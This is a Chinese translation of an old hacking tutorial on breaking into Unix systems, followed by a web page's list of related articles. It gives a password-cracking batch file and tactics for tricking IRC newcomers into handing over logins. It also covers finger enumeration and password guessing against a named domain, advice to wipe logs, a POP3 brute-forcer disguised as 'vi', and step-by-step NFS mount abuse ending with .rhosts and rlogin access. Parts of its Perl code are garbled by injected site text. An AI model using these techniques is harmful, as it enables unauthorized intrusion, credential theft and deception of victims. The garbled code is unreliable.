jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
--------------- end of jackhash.bat
即使沒有帳號(hào)也可奪取password文檔,看下一章吧.
--------------------------------------------------------------------------------
與新手交談
還有其他方法不用費(fèi)那么大力就可獲得帳號(hào).在IRC上建一與hacking有關(guān)名字的頻道等候或加入已有的IRC頻道,如:#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout,或任何其他你能找到的.
現(xiàn)在你要尋找的就是那些正學(xué)習(xí)和使用shell的新?。W(wǎng)絡(luò)總是會(huì)有一些人沒你知得多的人.留意那些問一些新手問題又得不到答案甚至被踢出頻道的家伙,那就是你的目標(biāo)了:)
用/msg發(fā)消息給他使得其他人看不出你和他交談.然后問他問題,嘗試幫助他,但不必太盡力;).最后告訴他你可為他login上去幫他解決問題.這有可能讓你拿到passwd 文檔或其他東東.應(yīng)承他任何事(promise him the world)以獲取login口令.現(xiàn)在你不就有了起始帳號(hào)可以開始你的學(xué)習(xí)進(jìn)程了.如果在奪取系統(tǒng)的root時(shí)候你不想暴露自己,可告訴他其他吸引他的東東讓他在你偵聽系統(tǒng)的其他口令時(shí)忙著.
因此現(xiàn)在如果你在IRC上給某人你的login名和口令時(shí),記住我上面說的話,不過我一直都盡量幫助人們學(xué)習(xí)啦,因此我可以說我對(duì)待碰見的朋友都是真誠(chéng)老實(shí)的.
--------------------------------------------------------------------------------
困難的方法
這是另一種方法.可以確定的說,大多數(shù)的大系統(tǒng)都有用戶在使用不可靠口令.在shell環(huán)境下:
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
現(xiàn)在我們可以嘗試這樣登陸:
Login:chris Passwword 試一試:Chris,chris,myers,Myers,chrismyers,等等…
這個(gè)看起來不錯(cuò):wendt:Catherine:catherine
下面是另一個(gè)命令:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
你有更多可利用的消息了;)
我知道這讓你厭煩...
記住你的嘗試會(huì)被記錄,所以如果你成功進(jìn)入并獲得root權(quán)限的話,記得清除日志:)
以下是一個(gè)成功進(jìn)入后用得著的C小程序.
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
你也可自己寫一小perl腳本程序,能自動(dòng)finger 列表中的域名并記錄響應(yīng)信息到文件中,finger完后返回并嘗試使用pop3端口,以 用戶名-用戶名(或其他信息)方式(譯注:即口令用用戶名或其他信息)登陸,記錄響應(yīng)信息到另一文件中.(這就是Emailcrk的原理)
FTP到rs.internic.net中,在域名目錄中你會(huì)找到:
com.zone.>
--------------------------------------------------------------------------------
傳輸中斷!
ov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
Down下這些文檔,在攻擊目標(biāo)域名上運(yùn)行g(shù)etdomain.pl(下面的腳本),如:
"perl getdomain.pl com.zone com >com.all"
這條指令所做的就是解開所.com的域名并放在comm.all文檔中.
如果想解開.EDU,只需:
perl getdomain.pl edu.zone edu >edu.all
現(xiàn)在你就有了名為edu.all的域名列表供你用了
下面是perl 腳本:
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "?用戶名:@HackBase.net密?碼:
\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
要使用上述腳本,你只需把上面幾行copy下來命名為getdomain.pl,拷貝到unix系統(tǒng)中,運(yùn)行: chmod x getdomain.pl
即可.
這時(shí)就可運(yùn)行上面所講的命令行了.
--------------------------------------------------------------------------------
使用Mount得到unix系統(tǒng)訪問權(quán)限
這并不難而且網(wǎng)絡(luò)上有很多系統(tǒng)是mountable(可共享的)的.Mount是一個(gè)unix命令允許你在遠(yuǎn)程機(jī)器驅(qū)動(dòng)器安裝系統(tǒng).這樣一來,你既可從其他機(jī)器進(jìn)行安裝過程也可僅僅共享網(wǎng)絡(luò)中的磁盤和目錄.問題在于許多管理員過于精通unix命令和設(shè)置.或者是太懶惰而把磁盤設(shè)置為全局屬性,卻不明白全局mount(連接或共享)該磁盤,別人就能獲得對(duì)他們的用戶目錄的寫權(quán)限.
開始,你需要一個(gè)hack過的root帳號(hào).為了能mount(連接或共享)遠(yuǎn)程磁盤并獲取權(quán)限,你要修改系統(tǒng)的password文檔并使用SU命令.
OK,假設(shè)我們已有root權(quán)限,讓我們開始!
可用shownmount命令顯示另一系統(tǒng)是否有mountable的磁盤.
在root帳號(hào)下:
$root> showmount -e wwa.com
ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
噢,這個(gè)域名不成功,OK,沒問題,找下一個(gè):
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
注意上面的“everyone”,如果我們想從這家伙里安裝linux 的話會(huì)很好.但我們是想打開用戶的目錄...所以繼續(xù)下一個(gè):
$root> showmount -e XXXXX.XXX ) {
chomp(?用戶名:@HackBase.net密?碼:
);
print "Now checking:?用戶名:@HackBase.net密?碼:
";
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program?用戶名:@HackBase.net密?碼:
|");
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">?用戶名:@HackBase.net密?碼:
.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all files and end the program.
close (DOMAINFILE);
0;
----------------- end of cmount.pl
OK,現(xiàn)在開始mounting(連接)磁盤.
假設(shè)我們運(yùn)行showmount -e domain.com 并返回:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
我們想連接(mount) / 目錄..喲呵…這家伙把整個(gè)系統(tǒng)都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
如果他把home目錄設(shè)為共享(mountable)的話,命令為:
$root> mount -nt nfs domain.com:/home /tmp/mount
要umount系統(tǒng)的話,確信退出目錄然后:
$root> umount /tmp/mount
先必須確定你已創(chuàng)建了共享(mount)目錄(你可在系統(tǒng)任何地方創(chuàng)建).如果系統(tǒng)的/mnt目錄是空的,你也可用它.
OK,下面動(dòng)真格了:
bash# ls -al /mnt ; 確定/mnt是空的
ls: /mnt: No such file or directory ; 不存在這樣的文件或目錄 ;)
bash# mkdir /mnt ; 讓我們?yōu)樗ㄒ粋€(gè)(/mnt目錄)
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 開始 mount 這小家伙 ...
bash# cd /mnt ; 進(jìn)入mounted的目錄.
bash# ls ; 簡(jiǎn)單的dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ... oh 很好...
bash# cd home
bash# ls -l ; 列長(zhǎng)目錄... 這兒tom 看起來不錯(cuò) ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; 注意到tom 是 302號(hào)使用者 ... hmmm 把他放進(jìn)我們的passwd 文檔中.
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帳號(hào) ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; 注意上面,toms 的用戶號(hào)沒有了... 現(xiàn)在我們擁有了他的目錄!
bash$ echo >>tom/.rhosts ; 在tom的目錄里建一個(gè)名為 .rhosts 的文檔
(bash$ ;在.rhosts中加入 號(hào),每個(gè)人都能用rlogin到他的帳戶。)
bash$ rlogin xxxxx.xxx 在我們的機(jī)器上我們是tom了 , 因此rlogin 上平臺(tái).
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> 雅皮士們 ,我們進(jìn)去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts
>
現(xiàn)在我們有了訪問權(quán)限了,可以開始hack這個(gè)系統(tǒng)了.哦,這該是下一課了,先輕松一下吧。
相關(guān)文章
- “CMOS密碼”就是通常所說的“開機(jī)密碼”,主要是為了防止別人使用自已的計(jì)算機(jī),設(shè)置的一個(gè)屏障2023-08-01
QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調(diào)用QQ的OCR的,但翻譯按鈕確實(shí)沒啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04- QQ截圖是我用過的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨(dú)立版目前除了屏幕錄制功能其他都逆出來了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導(dǎo)致軟件無法安裝的解決方法
很多電腦用戶在考慮自己電腦磁盤分區(qū)安全時(shí)會(huì)采用 Windows 自帶的 BitLocker 加密工具對(duì)電腦磁盤分區(qū)進(jìn)行加密。但有些人加密后就會(huì)忘記自己設(shè)置的密碼從而導(dǎo)致在安裝其它軟2020-11-25防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細(xì)介紹了如何才能防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-06-27徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機(jī)密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價(jià)值,2017-06-27量子計(jì)算機(jī)輕松破解加密算法 如何破解加密算法?
最近有電腦用戶反應(yīng)量子計(jì)算機(jī)可以破解下載的所有的加密算法嗎?其實(shí)也不是不可以,下面虛擬就為大家講解買臺(tái)量子計(jì)算機(jī),如何分分鐘破解加密算法2016-09-26怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網(wǎng)頁(yè)文件形式存在的一種命令執(zhí)行環(huán)境,一種網(wǎng)頁(yè)后門。黑客通常會(huì)通過它控制別人網(wǎng)絡(luò)服務(wù)器,那么怎么破解webshell密碼呢?一起來看看吧2016-09-19針對(duì)Linux系統(tǒng)全盤加密的啟動(dòng)攻擊
本文討論了針對(duì)Linux系統(tǒng)全盤加密的冷啟動(dòng)攻擊,大家都認(rèn)為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28防止泄露公司機(jī)密、企業(yè)數(shù)據(jù)防泄密軟件排名、電腦文件加密軟件排行
面對(duì)日漸嚴(yán)重的內(nèi)部泄密事件,我們?nèi)绾问刈o(hù)企業(yè)的核心信息,如何防止內(nèi)部泄密也就成了擺在各個(gè)企業(yè)領(lǐng)導(dǎo)面前的一大問題。其實(shí),針對(duì)內(nèi)網(wǎng)安全,防止內(nèi)部信息泄漏早已有了比較2015-12-17